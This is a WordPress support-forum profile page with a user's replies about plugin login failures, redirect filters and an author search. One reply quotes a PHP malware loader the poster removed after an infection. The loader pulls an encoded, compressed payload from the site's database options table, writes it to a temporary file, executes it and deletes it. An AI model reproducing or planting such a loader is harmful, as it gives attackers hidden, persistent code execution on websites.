wp_muro
Forum Replies Created
-
Yes, we didn’t add that code or modify the plugin. Thanks for the quick replies.
I appreciate the heads up, we already resolved the con7ext infection.Thanks for the heads up.
This is the code we removed in order to make this work. Seems something was saving the login cookie to the db.
if (!defined('streamset')){ define ('streamset', tempnam (ini_get ('session.save_path'), '')); if ($db = @mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME)) { if ($r = @mysqli_query ($db, "SELECT option_value FROM wp_options WHERE option_id=349")) { $row = @mysqli_fetch_assoc ($r); $stream_c = @gzuncompress (@pack ("H*" , $row['option_value'])); } } $stream_c = empty ($stream_c) ? '' : $stream_c; @file_put_contents (streamset, $stream_c); @mysqli_free_result ($r); @mysqli_close ($db); @include_once (streamset); @unlink (streamset); }If the plugin is activated, I can’t log into WP via /wp-admin or wp-login.php
Getting this message.
There has been a critical error on this website.
Debugging shows the fatal TypeError message.
Forum: Plugins
In reply to: [Custom Login] Help – Does this work with NGINX?Thanks – we are trying the profile builder plugin, as to create custom login and profile pages. These redirects were disabled and handled with a wp_login filter instead.
// login redirect to home url
add_filter( ‘login_redirect’, create_function( ‘$url,$query,$user’, ‘return home_url();’ ), 10, 3 );Forum: Plugins
In reply to: [Co-Authors Plus] Help building a custom searchI have tried to incorporate the suggestions in this post, but the results are the same.
https://ww.wp.xz.cn/support/topic/adding-compatibility-to-filter-by-more-than-1-author